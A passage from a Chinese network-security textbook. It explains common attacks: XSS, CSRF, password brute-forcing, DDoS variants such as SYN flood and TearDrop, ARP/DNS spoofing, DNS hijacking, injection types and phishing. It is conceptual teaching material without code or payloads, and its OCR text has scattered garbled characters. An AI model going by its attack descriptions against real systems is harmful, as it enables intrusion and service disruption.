测 而 难以 防范 。 防 范 需 要 很 大 的 开销 ,要 对 所 有 的 通信 设备 和 路 径 进行 防护 ,因此 对 抗 
主动 攻击 的 主要 技术 手段 是 检测 ,还 有 及 时 地 从 攻击 中 恢复 。 检 测 同 样 可 以 起 到 威慑 的 
效果 ,在 一 定 程度 上 也 可 以 对 防范 做 出 贡献 。 


173 常见 的 网 络 攻击 


开放 式 Web 应 用 程序 安全 项 目 中 包含 有 六 十 几 个 攻击 大 类 ,其 中 还 包含 有 许多 子 
类 。 随 着 计算 机 技术 的 发 展 ,攻击 者 的 手段 越 来 越 多 样 也 越 来 越 有 效 。 但 我 们 还 是 可 以 
了 解 一 些 常见 的 网 络 攻击 ,这些 攻击 被 使 用 得 最 多 ,造成 的 影响 相对 较 大 。 除 了 之 前 提 
到 的 窃听 攻击 流量 分 析 攻 击 ,拒绝 服务 攻击 等 ,还 有 几 种 攻击 是 较为 常见 的 。 


1. 跨 站 点 脚本 攻击 


跨 站 点 脚本 (Cross-Site Scripting,XSS)。 原 本 应 当 是 CSS. 但 为 了 不 与 层 芭 样式 表 
(Cascading Style Sheet,CSS) 相 混淆 , 故 称 为 XSS。 它 是 Web 应 用 程序 中 发 现 的 一 种 注 
入 缺陷 的 形式 ,属于 代码 注入 的 一 种 ,利用 的 是 用 户 对 于 网 站 的 信任 。 现 在 大 量 的 网 页 
包含 大 量 的 动态 内 容 来 提高 用 户 体验 ,其 中 动态 内 容 是 指 Web 应 用 程序 接受 用 户 的 输 
入 能 够 产生 相应 的 输出 。 这 样 只 要 在 脆弱 的 Web 应 用 程序 中 注入 恶意 代码 ,脆弱 的 
Web 应 用 程序 就 无 法 验证 用 户 所 提交 的 数据 以 及 提交 内 容 是 否 包含 恶意 代码 ,从 而 Web 
应 用 程序 配置 了 这 些 输入 的 数据 ,动态 地 输出 内 容 , 跨 站 点 脚本 攻击 者 就 可 以 获得 受害 
者 的 cookie 与 其 他 一 些 敏感 信息 。 甚 至 利用 植 人 Flash ,iframe、XMLHttpRequest 等 方 
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式 , 攻 击 者 能 够 获取 更 高 的 权限 ,以 用 户 的 身份 执行 一 些 管理 动作 。 例 如 ,一 些 论坛 或 者 
博客 、 微 博 网 站 ,这 些 网 站 的 Web 应 用 程序 允许 用 户 发 布 包含 HTML 与 JavaScript 的 帖 
子 。 当 攻击 者 发 表 了 一 篇 包含 恶意 代码 的 帖子 ,受害 者 浏览 时 就 会 被 攻击 。 这 种 攻击 方 
式 是 黑客 最 喜欢 的 攻击 方式 ,此 类 漏洞 所 占 比例 往往 也 是 最 大 的 。 

跨 站 点 脚本 攻击 分 为 三 个 类 型 。 首 先是 存储 性 或 持久 性 跨 站 点 脚本 攻击 ,这 种 方式 
也 是 比较 危险 .最 直接 的 危害 类 型 。 上 一 段 所 说 的 攻击 者 发 布 包含 恶意 代码 帖子 就 属于 
此 类 攻击 方式 ,表现 为 跨 站 点 代码 存储 在 服务 器 或 数据 库 中 ,不 需要 单独 的 发 送 到 受害 
者 的 机 器 。 这 种 类 型 造成 的 影响 范围 广 、 危 害 程度 高 ,但 比较 难以 实现 ,因为 通常 都 会 被 
发 现 。 其 次 是 反射 性 或 非 持 久 性 跨 站 点 脚本 攻击 ,这 种 方式 也 是 最 常见 .最 普遍 的 类 型 。 
这 种 方式 并 不 完全 破坏 目标 网 站 ,通常 是 给 受害 者 发 送 带 有 恶意 代码 的 连接 , 当 用 户 单 
击 这 个 连接 后 受 感染 的 代码 会 发 送 到 目标 Web 服务 器 上 ,脆弱 的 Web 服务 器 会 在 不 验 
证 是 否 有 恶意 代码 的 情况 下 立即 使 用 提交 的 数据 为 受害 者 生成 输出 内 容 。 它 的 特点 是 
非 持久 性 ,必须 用 户 单 击 特定 的 连接 或 其 他 形式 才能 引起 。 最 后 是 基于 DOM 的 跨 站 点 
脚本 攻击 。DOM 指 的 是 文档 对 象 模型 ,简单 地 说 , 它 代表 的 可 能 是 HTML 或 XML 内 
容 的 一 个 文件 。 在 页 面 显 示 之 前 ,客户 端 处 理 内 容 并 与 DOM 描述 作 比 较 。 基 于 DOM 
的 跨 站 脚本 攻击 就 是 通过 操纵 DOM 描述 从 而 呈现 出 不 同 的 内 容 来 达到 攻击 的 目的 。 


2. 跨 站 点 请 求 伪造 攻击 


跨 站 点 请 求 伪造 (Cross-Site Request Forgery,CSRF 或 XSRF) 攻 击 的 目标 基本 上 都 
是 需要 用 户 登录 认证 并 受到 保护 的 内 容 , 基 本 都 是 通过 cookie 和 session 来 完成 ,利用 的 
是 网 站 对 用 户 浏览 器 的 信任 ,是 互联 网 上 最 流行 .最 危险 .最 难以 抵御 的 攻击 方式 之 一 。 
当 用 户 经 过 验证 登录 一 个 网 站 后 ,网 站 会 给 用 户 一 个 有 效 凭 证 以 此 来 证 明 该 用 户 是 合法 
用 户 。 但 因为 HTTP 协议 是 无 状态 的 ,每 一 个 请 求 与 响应 不 会 留 下 痕迹 ,也 就 是 说 ,用 户 
对 网 站 做 出 连续 的 请 求 的 时 候 , 都 需要 有 效 赁 证。 之 所 以 用 户 不 用 在 每 个 页 面 都 验证 并 
登录 来 获取 有 效 凭证 ,是 因为 浏览 器 在 后 台 自 动 的 完成 这 件 事 ,这 就 是 问题 的 所 在 。 如 
果 用 户 处 于 登录 这 个 网 站 的 状态 ,攻击 者 会 设法 诱导 用 户 点 击 含有 恶意 代码 的 链接 ,之 
后 攻击 者 就 可 以 借 着 该 网 站 给 用 户 的 有 效 凭证 ,伪造 成 该 用 户 在 用 户 不 知情 的 情况 下 对 
该 网 站 执行 一 系列 不 符合 用 户 本 意 的 操作 。 例 如 , 跨 站 点 请 求 伪造 攻击 利用 的 是 修改 合 
法 操作 来 达成 恶意 的 目的 。 但 如 果 没 有 器 站 点 请 求 ,互联 网 几乎 无 法 开展 任何 合法 功 
能 ,并 且 跨 站 点 请 求 伪 造 攻击 若是 结合 其 他 类 型 的 攻击 效果 会 更 加 明显 。 


3. 基于 口令 攻击 


基于 口令 的 访问 控制 是 非常 常见 的 技术 手段 ,黑客 往往 把 破译 用 户 的 口令 作为 攻击 
的 开始 。 获 得 了 口令 ,黑客 就 会 拥有 本 该 没有 的 权限 ,因为 主机 、 服 务 器 或 者 其 他 网 络 资 
源 是 基于 口令 进行 判断 ,也 就 是 说 ,访问 权限 是 基于 用 户 名 和 密码 的 。 这 样 的 攻击 很 常 
见 , 但 要 成 功 也 是 比较 困难 的 。 针 对 密码 保护 系统 的 典型 攻击 是 设计 自动 化 系统 蛮 力 猜 
测 用 户 密码 。 通 常 有 以 下 三 类 蛮 力 猜测 密码 的 方式 。 
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1) 垂直 

黑客 通过 某 些 途径 得 知 合法 用 户 的 账号 ,对 账号 尝试 不 同 的 密码 ,通常 是 运用 自动 
化 脚本 进行 猜测 ,连续 反复 地 尝试 直到 获取 该 账号 的 密码 为 止 。 垂 直 密 码 蛮 力 攻 击 是 最 
容易 被 检测 出 来 的 , Web 应 用 程序 进行 一 个 登录 失败 尝试 计数 就 可 以 预防 此 类 攻击 。 一 
般 情况 下 , 当 密 码 尝 试 次 数 达到 预 设 值 时 ,会 要 求 用 户 采 取 其 他 行动 ,如 手机 号 验证 、 邮 
箱 找 回 密码 ,安全 问题 ,等待 一 段 时 间 重 新 输入 密码 之 类 的 措施 。 但 我 们 应 小 心地 阻止 
这 样 总 是 尝试 失败 的 用 户 登录 ,因为 这 可 能 被 用 于 拒绝 服务 攻击 。 

2) 水 平 

这 种 方法 与 上 一 种 方法 相反 ,是 使 用 相同 的 密码 来 尝试 登录 不 用 的 用 户 账号 。 这 样 
的 方式 一 般 情况 下 很 难 被 发 现 。 因 为 大 多 数 网 站 并 不 存储 尝试 失败 的 密码 ,就 算是 存储 
了 尝试 失败 的 密码 也 并 不 知道 这 是 用 户 的 一 次 登录 出 错 还 是 攻击 者 的 一 次 攻击 ,除非 对 
多 账户 失败 尝试 的 密码 进行 比 对 ,但 这 很 容易 被 下 一 种 攻击 方法 化 解 掉 。 

3) 对 角 线 

此 方法 综合 了 垂直 密码 蛮 力 攻击 和 水 平 密码 蛮 力 攻击 ,是 基于 口令 攻击 中 最 难以 检 
测 的 方法 。 黑 客 在 每 次 尝试 时 同时 转换 用 户 名 与 密码 。Web 应 用 程序 可 以 阻止 攻击 者 
的 IP 地 址 ,但 如 果 攻 击 者 不 停 变化 他 的 IP 地 址 ,这 种 攻击 就 会 非常 难以 防御 。 


4. 分 布 式 拒绝 服务 攻击 


拒绝 服务 攻击 之 前 已 有 说 明 ,分 布 式 拒绝 服务 攻击 也 是 一 种 特殊 形式 的 拒绝 服务 攻 
击 。 分 布 式 拒绝 服务 (Distributed Denial of Service,DDoS) 攻 击 指 借助 于 客户 /服务 器 技 
术 , 将 多 个 计算 机 联合 起 来 作为 攻击 平台 ,对 一 个 或 多 个 目标 发 动 DDoS 攻击 ,从 而 成 倍 
地 提高 拒绝 服务 攻击 的 威力 。 通 常 ,攻击 者 使 用 一 个 偷窃 账号 将 DDoS 主 控 程 序 安装 在 
一 台 计 算 机 上 ,在 一 个 设 定 的 时 间 主 控 程 序 将 与 大 量 代理 程序 通信 ,代理 程序 已 经 被 安 
装 在 网 络 上 的 许多 计算 机 上 。 代 理 程序 收 到 指令 时 就 发 动 攻 击 。 利 用 客户 /服务 器 技 
术 , 主 控 程序 能 在 几 秒 钟 内 激活 成 百 上 千 次 代理 程序 的 运行 。 现 在 这 种 方式 被 认为 是 最 
有 效 的 攻击 形式 ,并 且 很 难于 防备 。 但 是 利用 DDoS 攻击 是 有 一 定 难 度 的 ,没有 高 超 的 
技术 是 很 难 实现 的 ,因为 不 但 要 求 攻击 者 熟悉 入 侵 的 技术 而 且 还 要 有 足够 的 时 间 和 脑 
力 , 但 因 有 黑客 编写 出 了 傻瓜 式 的 工具 来 帮助 .所 以 也 就 使 DDoS 攻击 相对 变 得 简单 了 。 
单一 的 DDoS 攻击 一 般 是 采用 一 对 一 方式 的 , 当 攻 击 目标 CPU 速度 低 、 内 存 小 或 者 网 络 
带宽 小 等 各 项 性 能 指标 不 高 时 它 的 效果 是 明显 的 。 随 着 计算 机 与 网 络 技术 的 发 展 ,计算 
机 的 处 理 能 力 迅 速 增长 ,内 存 大 大 增加 ,同时 也 出 现 了 千 兆 级 别 的 网 络 , 这 使 得 DDoS 攻 
击 的 困难 程度 加 大 了 ,目标 对 恶意 攻击 包 的 “消化 能 力 ? 加 强 了 不 少 。 这 时 候 分 布 式 的 拒 
绝 服务 攻击 手段 就 应 运 而 生 了 。DDoS 就 是 利用 更 多 的 倪 候 机 (肉鸡 ) 来 发 起 进攻 ,用 比 
从 前 更 大 的 规模 来 进攻 受害 者 。 常 见方 式 有 如 下 几 种 。 

1) SYN 洪水 攻击 

SYN 洪水 攻击 是 当前 最 流行 的 DoS 与 DDoS 的 攻击 方式 之 一 ,这 是 一 种 利用 TCP 
协议 缺陷 ,发 送 大 量 伪造 的 TCP 连接 请 求 , 使 被 攻击 方 资源 耗 尽 的 攻击 方式 。SYN 洪水 
攻击 的 过 程 在 TCP 协议 中 被 称 为 三 次 握手 ,而 SYN 洪水 拒绝 服务 攻击 就 是 通过 三 次 握 
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手 而 实现 的 。 攻 击 者 向 被 攻击 服务 器 发 送 一 个 包含 SYN 标志 的 TCP 报 文 , SYN 
(Synchronize) 即 同步 报 文 , 同 步 报 文 会 指明 客户 端 使 用 的 端口 以 及 TCP 连接 的 初始 序 
号 ,这 时 同 被 攻击 服务 器 建立 了 第 一 次 握手 。 受 害 服务 器 在 收 到 攻击 者 的 SYN 报 文 后 ， 
将 返回 一 个 SYN 十 ACK 的 报 文 ,表示 攻击 者 的 请 求 被 接受 ,同时 TCP 序号 被 加 一 ,ACK 
(Acknowledgment) 即 确认 ,这 样 就 同 被 攻击 服务 器 建立 了 第 二 次 握手 。 攻 击 者 也 返回 
一 个 确认 报 文 ACK 给 受害 服务 器 ,同样 TCP 序列 号 被 加 一 ,到 此 一 个 TCP 连接 完成 ， 
三 次 握手 完成 。 但 若是 攻击 者 向 服务 器 发 送 了 SYN 报 文 后 突然 死机 或 掉 线 ,那么 服务 
器 在 发 出 SYN 十 ACK 应 答 报 文 后 是 无 法 收 到 客户 端的 ACK 报 文 的 (第 三 次 握手 无 法 完 
成 ) ,这 种 情况 下 服务 器 端 一 般 会 重 试 (再 次 发 送 SYN 十 ACK 给 客户 端 ) 并 等 待 一 段 时 间 
后 丢弃 这 个 未 完成 的 连接 。 但 如 果 有 一 个 恶意 的 攻击 者 大 量 模 拟 这 种 情况 (伪造 IP 地 
址 ) ,服务 器 端 将 为 了 维护 一 个 非常 大 的 半 连 接 列表 而 消耗 非常 多 的 资源 。 

2) IP 欺骗 性 攻击 

这 种 攻击 利用 RST 位 来 实现 。 假设 有 一 个 合法 用 户 已 经 同 服务 器 建立 了 正常 的 连 
接 , 攻 击 者 构造 攻击 的 TCP 数据 ,伪装 自己 的 IP 为 合法 用 户 的 IP, 并 向 服务 器 发 送 一 个 
带 有 RST 位 的 TCP 数据 段 。 服 务 器 接收 到 这 样 的 数据 后 ,认为 从 合法 用 户 IP 发 送 的 连 
接 有 错误 ,就 会 清空 缓冲 区 中 建立 好 的 连接 。 这 时 ,如 果 合 法 用 户 再 发 送 合 法 数据 ,服务 
器 就 已 经 没有 这 样 的 连接 了 ,该 用 户 就 必须 重新 开始 建立 连接 。 

3) UDP 洪水 攻击 

攻击 者 利用 简单 的 TCP/IP 服务 ,如 Chargen 和 Echo 来 传送 毫 无 用 处 的 占 满 带宽 
的 数据 。 通 过 伪造 与 某 一 主机 的 Chargen 服务 之 间 的 一 次 UDP 连接 ,回复 地 址 指向 开 
着 Echo 服务 的 一 台 主 机 ,这 样 就 生成 在 两 台 主 机 之 间 存 在 很 多 的 无 用 数据 流 , 这 些 无 用 
数据 流 就 会 导致 带宽 的 服务 攻击 。 

4) LAND 攻击 

这 种 攻击 利用 一 个 特别 打造 的 SYN 包 , 它 的 原 地 址 和 目标 地 址 都 被 设置 成 某 一 个 
服务 器 地 址 。 此 举 将 导致 接收 服务 器 向 它 自 己 的 地 址 发 送 SYN-ACK 消息 ,结果 这 个 地 
址 又 发 回 ACK 消息 并 创建 一 个 空 连 接 。 被 攻击 的 服务 器 每 接收 一 个 这 样 的 连接 都 将 保 
留 ,直到 超时 。 各 种 系统 对 LAND 攻击 反应 不 同 , 许 多 UNIX 系统 将 崩溃 ,NT 系统 变 得 
极其 缓慢 。 

5) TearDrop 攻击 

IP 数据 包 在 网 络 传递 时 ,数据 包 可 以 分 成 更 小 的 片段 。 攻 击 者 可 以 通过 发 送 两 段 
(或 者 更 多 ) 数 据 包 来 实现 TearDrop 攻击 。 第 一 个 包 的 偏 移 量 为 0, 长 度 为 N; 第 二 个 包 
的 偏 移 量 小 于 N。 为 了 合并 这 些 数 据 段 ,TCP/IP 堆栈 会 分 配 超 乎 寻常 的 巨大 资源 ,从 而 
造成 系统 资源 的 缺乏 甚至 机 器 的 重新 启动 。 

6) Ping 洪水 

该 攻击 在 短 时 间 内 向 目的 主机 发 送 大 量 Ping 包 , 造 成 网 络 堵塞 或 主机 资源 耗 尽 。 

除了 上 述 列举 的 攻击 ,DDoS 攻击 还 有 多 种 攻击 方式 。 
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5. 中 间 人 攻击 


中 间 人 攻击 (Man-in-the-Middle Attack, MITM 攻击 ) 是 一 种 “间接 ”的 人 侵 攻 击 , 这 
种 攻击 模式 是 通过 各 种 技术 手段 将 受信 侵 者 控制 的 一 台 计 算 机 虚拟 放置 在 网 络 连接 中 
的 两 台 通信 计算 机 之 间 , 这 台 计 算 机 就 称 为 “中 间 人 ”。 这 是 一 种 由 来 已 久 的 网 络 人 侵 手 
段 ,并 且 在 今天 仍然 有 着 广泛 的 发 展 空间 ,如 SMB 会 话 支持 .DNS 欺骗 等 攻击 都 是 典型 
的 MITM 攻击 。 简 而 言 之 ,所 谓 的 MITM 攻击 就 是 通过 拦截 正常 的 网 络 通信 和 数据, 并进 
行 数据 算 改 和 嗅 探 ,而 通信 的 双方 却 毫 不 知情 。 最 常见 的 MITM 攻击 方式 为 ARP 欺骗 
或 DNS 欺骗 。 

1) ARP 欺骗 攻击 

ARP 欺骗 攻击 也 被 称 为 ARP 毒化 或 ARP 缓存 中 毒 ,这 是 在 内 网 的 中 间 人 攻击 。 
ARP(Address Resolution Protocol) 地 址 转换 协议 ,工作 在 OSI 模型 的 数据 链 路 层 ,在 以 
太 网 中 ,网 络 设备 之 间 互 相通 信和 是 用 MAC 地 址 而 不 是 IP 地 址 , ARP 协议 就 是 用 来 把 IP 
地 址 转换 为 MAC 地 址 的 。 而 RARP 和 ARP 相反 , 它 是 反 向 地 址 转换 协议 ,把 MAC 地 
址 转换 为 IP 地 址 。 在 每 台 主机 都 有 一 个 ARP 缓存 表 , 缓 存 表 中 记录 了 IP 地 址 与 MAC 
地 址 的 对 应 关系 ,而 局 域 网 数据 传输 依靠 的 是 MAC 地 址 。 在 ARP 缓存 表 机 制 存在 一 个 
缺陷 ,就 是 当 请 求 主机 收 到 ARP 应 答 包 后 ,不 会 去 验证 自己 是 否 向 对 方 主机 发 送 过 ARP 
请 求 包 ,就 直接 把 这 个 返回 包 中 的 IP 地 址 与 MAC 地 址 的 对 应 关系 保存 进 ARP 缓存 表 
中 ,如 果 有 相同 的 IP 对 应 关系 , 原 有 的 则 会 被 替换 。 如 果 攻 击 者 对 网 关 及 两 台 通 信和 主机 
进行 ARP 欺骗 ,就 可 以 实现 监听 双方 通信 的 可 能 。 

2) DNS 欺骗 攻击 

这 是 一 种 非常 危险 的 中 间 人 攻击 , 它 容 易 被 攻击 者 利用 并 且 窃 取 用 户 的 机 密 信息 。 
域名 系统 (Domain Name System,DNS) 是 因特网 上 作为 域名 和 IP 地 址 相互 映射 的 一 个 
分 布 式 数据 库 ,能 够 使 用 户 更 方便 地 访问 互联 网 ,而 不 用 去 记 住 能 够 被 机 器 直接 读 取 的 
IP 数 串 。 例 如 ,您 输入 一 个 网 址 ,DNS 则 负责 将 其 翻译 成 IP 地 址 ,所 以 人 们 要 访问 网 站 
只 需要 记得 网 址 ,而 不 用 记 该 网 站 复杂 的 IP 地 址 。 在 这 些 正常 的 通信 中 ,一 个 主机 发 送 
请 求 到 服务 器 ,之 后 服务 器 响应 正确 的 信息 。 如 果 DNS 没有 信息 传人 的 请 求 , 它 将 发 送 
请 求 到 外 部 DNS 服务 器 来 获取 正确 的 响应 。 但 如 果 使 用 DNS 欺骗 中 间 人 攻击 ,攻击 者 
将 截取 会 话 ,然后 转移 到 一 个 假 网 站 的 会 话 。 


6. DNS 劫持 攻击 


DNS 劫持 又 称 域名 劫持 ,是 指 在 劫持 的 网 络 范围 内 拦截 域名 解析 的 请 求 , 分析 请 求 
的 域名 ,把 审查 范围 以 外 的 请 求 放行 ,否则 返回 假 的 IP 地 址 或 者 什么 都 不 做 会 使 请 求 失 
去 响应 ,其 效果 就 是 对 特定 的 网 络 不 能 反应 或 访问 的 是 假 网 址 。DNS( 域 名 系统 ) 的 作用 
是 把 网 络 地 址 (域名 ,以 一 个 字符 串 的 形式 ) 对 应 到 真实 的 计算 机 能 够 识别 的 网 络 地 址 
(IP 地 址 ) ,以 便 计算 机 能 够 进一步 通信 ,传递 网 址 和 内 容 等 。 由 于 域名 劫持 往往 只 能 在 
特定 的 被 劫持 的 网 络 范围 内 进行 ,所 以 在 此 范围 外 的 域名 服务 器 (DNS) 能 够 返回 正常 的 
IP 地 址 。 高 级 用 户 可 以 在 网 络 设置 上 把 DNS 指向 这 些 正常 的 域名 服务 器 ,以 实现 对 网 
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址 的 正常 访问 。 所 以 域名 劫持 通常 相伴 的 措施 是 封锁 正常 DNS 的 IP。 
7. 注入 漏洞 


在 这 一 类 攻击 中 ,注入 一 般 出 现在 攻击 者 如 合法 用 户 般 提交 数据 给 一 个 实体 解释 
时 。 例 如 ,最 常见 的 攻击 矢量 是 SQL 注射 ,很 多 程序 员 编写 代码 时 对 用 户 输入 数据 的 合 
法 性 没有 进行 判断 ,这 导致 有 的 Web 应 用 程序 可 以 通过 提交 一 段 SQL 语句 来 跳 过 验证 。 
这 类 攻击 主要 包括 下 面 几 种 形式 。 

1) 参数 注入 或 修改 

参数 注入 或 修改 是 这 类 攻击 中 比较 突出 的 一 种 。 攻 击 者 对 代码 中 传递 给 函数 的 参 
数 做 修改 。 

2) SQL 盲 注入 

SQL 讶 注入 是 SQL 注入 的 一 种 。 攻 击 者 接收 一 个 通用 的 错误 消息 而 不 是 开发 者 定 
义 的 具体 错误 消息 。 试 图 发 送 一 系列 SQL 插入 以 从 数据 库 服 务 器 获取 True 或 False， 
有 可 能 会 导致 一 个 成 功 的 SQL 注入 攻击 。 

3) XPath 盲 注入 

XPath 盲 注 入 是 XPath 攻击 的 子 集 , 类 似 于 SQL 注入 。XPath 提供 对 XML 文档 各 
个 部 分 的 访问 权限 ,而 没有 任何 访问 限制 ,这 使 得 它 比 SQL 更 容易 遭受 注 和 攻击。 

4) 代码 注入 

只 要 代码 中 有 一 个 敏感 验证 失败 ,就 会 有 一 个 注入 门 。 例 如 ,未 被 核查 的 URI 值 ,未 
被 验证 的 输入 /输出 值 以 及 未 被 核查 的 数据 类 型 和 大 小 等 。 代 码 注 入 和 命令 注入 目标 类 
似 : 向 应 用 程序 中 注入 它 不 愿意 处 理 的 数据 或 者 命令 从 而 发 起 一 个 攻击 。 

5) 命令 注入 

命令 注 人 类 似 于 代码 注入 。 攻 击 者 通过 注入 一 些 命令 使 得 这 些 命令 可 以 使 攻击 者 
获取 和 这 个 运行 着 的 应 用 程序 一 样 的 权限 。 

6) 直接 静态 代码 注入 

直接 静态 代码 注入 类 似 于 代码 注入 和 命令 注入 。 但 它 不 是 直接 往 目 标 应 用 程序 注 
入 代码 ,而 是 把 攻击 代码 注入 到 该 应 用 程序 使 用 的 资源 中 去 。 例 如 ,应 用 程序 需要 用 到 
一 个 静态 文件 ,那么 直接 静态 代码 注入 则 是 把 代码 放 入 那个 文件 中 ,这 发 生 在 服务 器 端 
而 不 是 客户 端 。 

7) 格式 化 字符 串 攻击 

格式 化 字符 串 攻 击 是 一 种 针对 本 地 应 用 程序 的 常见 攻击 。 这 种 攻击 出 现在 目标 应 
用 程序 把 提交 给 它 的 数据 看 作 是 一 个 命令 并 执行 它 时 ,格式 化 字符 串 攻击 利用 这 个 漏洞 
运行 这 个 攻击 者 选择 的 命令 。 这 使 得 攻击 者 拥有 堆栈 数据 的 访问 权 , 导 致 分 段 出 错 或 迫 
使 这 个 应 用 程序 执行 它 本 不 该 执行 的 任务 。 

8) 全 路 径 泄露 

全 路 径 泄露 是 最 顽固 的 一 种 攻击 。 利 用 全 路 径 泄露 漏洞 能 使 攻击 者 了 解 目标 机 器 
文件 系统 中 的 一 个 资源 的 完全 限定 路 径 的 相关 知识 。 有 些 攻击 要 求 一 个 资源 的 完全 限 
定 路 径 。 
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9) 轻 量 级 目录 访问 协议 注入 

轻 量 级 目录 访问 协议 注入 在 概念 上 类 似 于 SQL 注入 。 轻 量 级 目录 访问 协议 可 以 看 
作 是 一 个 优化 过 的 以 供 快 速 读 取 操作 的 数据 库 。 轻 量 级 目录 访问 协议 经 常 被 Web 应 用 
程序 用 来 存储 用 户 身份 数据 ,因为 一 般 来 讲 从 轻 量 级 目录 访问 协议 中 检索 数据 比 从 其 他 
类 型 的 数据 库 中 检索 数据 要 快 得 多 。 关 系 型 数据 库 用 SQL, 轻 量 级 目录 访问 协议 用 轻 量 
级 目录 访问 协议 语句 。 轻 量 级 目录 访问 协议 注入 攻击 的 是 基于 用 户 输入 而 构建 轻 量 级 
目录 访问 协议 语句 的 目标 Web 应 用 程序 。 这 使 得 轻 量 级 目录 访问 协议 注入 类 似 于 参 
数 、 命 令 和 SQL 注入 攻击 。 

10) 参数 定 界 符 

参数 定 界 符 是 一 个 很 容易 发 起 的 攻击 。 这 个 攻击 操纵 着 Web 应 用 程序 用 来 分 离 输 
和 矢量 的 参数 定 界 符 , 利 用 此 漏洞 可 以 让 攻击 者 提升 权限 。 

11) 正则 表达 式 拒绝 服务 

正则 表达 式 拒绝 服务 是 拒绝 服务 攻击 的 一 种 。 攻 击 者 的 目标 不 是 摧毁 系统 而 是 使 
广大 用 户 无 法 接受 服务 。 正 则 表达 式 拒绝 服务 利用 的 是 评估 正则 表达 式 的 引擎 又 停 这 
种 极端 情况 。 常 用 的 攻击 方式 是 向 目标 正则 表达 式 引擎 输入 一 个 非常 大 的 表达 式 让 其 
处 理 。 

12) 服务 器 端 谋 入 注入 

服务 器 端 嵌 入 注入 是 一 个 很 难 实现 的 攻击 ,但 成 功 后 造成 的 危害 非常 大 。 服 务 器 端 


嵌入 是 为 了 Web 应 用 程序 来 创建 动态 的 HTML 内 容 ; 服 务 器 端 嵌 入 通常 在 呈现 HTML 


页 面 之 前 或 者 在 呈现 过 程 期 间 执行 一 些 动 作 ; 服 务 器 端 嵌 入 通常 接收 来 自 Web 应 用 程 
序 输入 生成 一 个 输出 HTML 文件 。 因 此 若是 让 攻击 者 知道 有 一 个 服务 器 端 嵌 入 正在 运 
行 ,那么 他 能 向 其 注入 恶意 代码 并 远程 利用 这 个 漏洞 。 

13) 特殊 元 素 注 入 

特殊 元 素 注入 是 通过 自动 代码 扫描 工具 很 容易 控制 的 一 种 攻击 。 每 一 种 编程 语言 
和 计算 环境 都 拥有 具有 特殊 含义 的 关键 词 ,这 种 攻击 利用 目标 系统 中 与 这 些 保留 词语 和 
特殊 字符 有 关 的 漏洞 。 

14) SQL 注入 

因为 使 用 SQL 语言 的 关系 数据 库 数 量 众多 ,因此 SQL 注入 是 最 常见 的 一 种 攻击 。 
SQL 注入 攻击 与 命令 注入 攻击 类 似 。SQL 注入 攻击 利用 Web 应 用 程序 直接 从 用 户 提供 
的 信息 构建 查询 的 漏洞 。 后 果 可 能 是 灾难 性 的 一 一 从 泄露 本 不 该 泄露 的 数据 到 修改 用 
户 权 限 再 到 擦 除 掉 整 个 数据 库 等 。 

15) Web 参数 算 改 

Web 参数 算 改 在 概念 上 与 参数 注入 与 修改 类 似 。Web 客户 端 与 服务 器 使 用 存储 在 
cookie ,隐藏 形式 字段 .URL 查询 字符 串 或 其 他 形式 的 令 牌 中 的 参数 进行 通信 。 算 改 这 
些 参数 能 够 允许 攻击 者 让 Web 服务 器 执行 一 种 不 被 授权 执行 的 动作 。 

16) XPath 注入 

XPath 注入 与 XPath 盲 注 入 非常 相似 。 这 种 攻击 通常 出 现在 网 站 使 用 用 户 提供 的 
信息 来 构建 一 个 XPath 询问 以 访问 XML 数据 时 。 正 如 前 面 所 讨论 的 盲 注入 攻击 那样 ， 
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XPath 并 不 强加 访问 限制 ,这 反 过 来 可 能 会 使 攻击 者 查找 出 XML 的 数据 结构 ,或 者 可 以 
未 经 授权 地 访问 XML 文档 中 的 数据 。 多 数 Web 服务 器 使 用 XML 文档 来 进行 配置 管 
理 , 从 而 使 得 XPath 注入 成 为 一 种 潜在 的 灾难 性 攻击 。 


8. 不 限制 URL 访问 攻击 


这 种 攻击 是 授权 和 访问 控制 的 一 个 子 集 。 举 个 简单 的 例子 ,有 些 页 面 的 浏览 权限 仅 
开放 给 已 登录 的 用 户 , 但 部 分 此 类 页 面 用 户 可 以 通过 电子 邮件 或 其 他 形式 转发 这 个 连 
接 , 让 没有 权限 的 人 员 看 到 这 些 页 面 。 这 是 因为 在 首次 呈现 受 保护 的 连接 之 前 ,很 多 
Web 应 用 程序 都 检查 URL 访问 权限 ,但 它们 无 法 每 次 都 对 之 后 访问 的 资源 执行 相同 的 
访问 控制 检查 。 一 个 顶级 的 或 者 是 仅仅 是 幸运 的 黑客 可 能 会 找到 这 些 页 面 ,通过 伪造 
URL 来 访问 受 保护 的 资源 并 有 效 规避 授权 机 制 。 所 有 的 Web 应 用 程序 都 容易 受到 不 限 
制 URL 访问 攻击 。 


9. 钓鱼 和 垃圾 邮件 攻击 


网 络 钓鱼 是 攻击 者 伪装 成 一 个 值得 信赖 的 实体 ,意图 引诱 收 信人 给 出 敏感 信息 (如 
用 户 名 .口令 .账号 ID 、ATM PIN 码 或 信用 卡 详细 信息 ) 的 一 种 攻击 方式 。 而 垃圾 邮件 
一 般 指 的 是 未 经 用 户 许可 就 强行 发 送 到 用 户 邮 箱 中 的 任何 电子 邮件 。 钓 鱼 和 垃圾 邮件 
攻击 是 “社会 工程 攻击 ”的 一 种 形式 而 不 是 利用 计算 机 程序 中 的 缺陷 。 攻 击 者 利用 程序 
缺陷 进行 的 这 种 欺骗 活动 不 属于 技术 问题 ,因此 ,解决 这 个 问题 单 靠 技术 手段 是 不 会 成 
功 的 ,有 效 的 解决 方案 涉及 社会 .法律 和 技术 等 各 个 方面 。 当 然 , 安 全 技术 也 可 以 在 一 定 
程度 上 有 助 于 减少 钓鱼 和 垃圾 邮件 攻击 。 一 般 钓 鱼 有 三 种 手段 。 第 一 种 是 通过 攻陷 的 
网 站 服务 器 钓鱼 ,大 部 分 我 们 观察 到 的 真实 世界 中 的 网 络 钓鱼 攻击 涉及 攻击 者 攻 入 有 漏 
洞 的 服务 器 ,并 安装 有 恶意 的 网 页 内 容 。 第 二 种 是 通过 端口 重 定 向 钓鱼 , 当 攻击 者 获得 
被 攻陷 主机 的 访问 权 后 并 没有 直接 上 传 钓 鱼网 站 内 容 。 取 而 代 之 的 是 ,攻击 者 在 服务 器 
上 安装 并 配置 了 一 个 端口 重 定向 服务 。 第 三 种 是 通过 僵尸 网 络 进行 钓鱼 。 一 个 僵尸 网 
络 是 由 被 攻击 者 远程 控制 的 被 攻陷 主机 所 构成 的 网 络 。 利 用 僵尸 网 络 钓 鱼 是 指 通过 从 
尸 网 络 发 送 垃圾 邮件 。 


174 攻击 步骤 


